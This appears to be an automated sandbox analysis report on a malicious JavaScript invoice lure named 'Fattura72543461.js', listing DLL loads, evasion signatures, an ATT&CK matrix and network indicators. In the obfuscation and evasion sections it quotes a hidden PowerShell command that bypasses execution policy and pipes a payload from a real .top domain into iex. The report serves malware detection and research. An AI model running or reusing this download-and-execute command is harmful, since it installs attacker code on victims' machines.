Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: softy.pdbdll source: powershell.exe, 00000003.00000002.1801297691.0000024973C52000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000003.00000002.1802633536.0000024973F4A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1802633536.0000024973F0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbivers\DriverDataNUMBER_OF_PROCESSORS=2OS=Windows_NTPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64ProgramData=C:\ProgramDataPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoottu source: powershell.exe, 00000003.00000002.1799160354.0000024971C68000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000003.00000002.1802633536.0000024973F4A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000003.00000002.1802633536.0000024973F78000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1802633536.0000024973F1B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000003.00000002.1801297691.0000024973C10000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdb source: powershell.exe, 00000003.00000002.1802633536.0000024973F1B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: tomation.pdbdb source: powershell.exe, 00000003.00000002.1801297691.0000024973CA5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbicKeyToken=b77a5c561934e089 source: powershell.exe, 00000003.00000002.1799160354.0000024971C68000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: CreateObject a0:%22Scripting.FileSystemObject%22");IHost.CreateObject("Scripting.FileSystemObject");IHost.Name();IFileSystem3._00000000();ITextStream.WriteLine(" exit:382 o:Windows%20Script%20Host f:CreateObject r:");IHost.ScriptFullName();IFileSystem3._00000000();ITextStream.WriteLine(" entry:389 o: f:DeleteFile a0:%22C%3A%5CUsers%5Cuser%5CDesktop%5CFattura72543461.js%22");IFileSystem3.DeleteFile("C:\Users\user\Desktop\Fattura72543461.js")
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb 'http://mbuzy3yvzw3r.top/1.php?s=mints13' | iex"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb 'http://mbuzy3yvzw3r.top/1.php?s=mints13' | iex"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFB4A1700BD pushad ; iretd 3_2_00007FFB4A1700C1

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\wscript.exeFile deleted: c:\users\user\desktop\fattura72543461.jsJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4756Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5021Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7984Thread sleep time: -18446744073709540s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8008Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: wscript.exe, 00000000.00000003.1664544881.000001C059D8A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}{,
Source: powershell.exe, 00000003.00000002.1802633536.0000024973F78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb 'http://mbuzy3yvzw3r.top/1.php?s=mints13' | iex"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb 'http://mbuzy3yvzw3r.top/1.php?s=mints13' | iex"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information32
Scripting
Valid Accounts1
Exploitation for Client Execution
32
Scripting
11
Process Injection
21
Virtualization/Sandbox Evasion
OS Credential Dumping1
Security Software Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts3
PowerShell
1
DLL Side-Loading
1
DLL Side-Loading
11
Process Injection
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
Obfuscated Files or Information
Security Account Manager21
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture12
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
File Deletion
LSA Secrets1
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
Fattura72543461.js11%ReversingLabsText.Malware.Boxter
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
www.google.com
142.250.201.4
truefalse
    high
    mbuzy3yvzw3r.top
    45.61.137.71
    truefalse
      high
      NameMaliciousAntivirus DetectionReputation
      http://mbuzy3yvzw3r.top/1.php?s=mints13false
        high
        http://www.google.com/false
          high
          NameSourceMaliciousAntivirus DetectionReputation
          https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gifpowershell.exe, 00000003.00000002.1782264899.0000024900F27000.00000004.00000800.00020000.00000000.sdmpfalse
            high
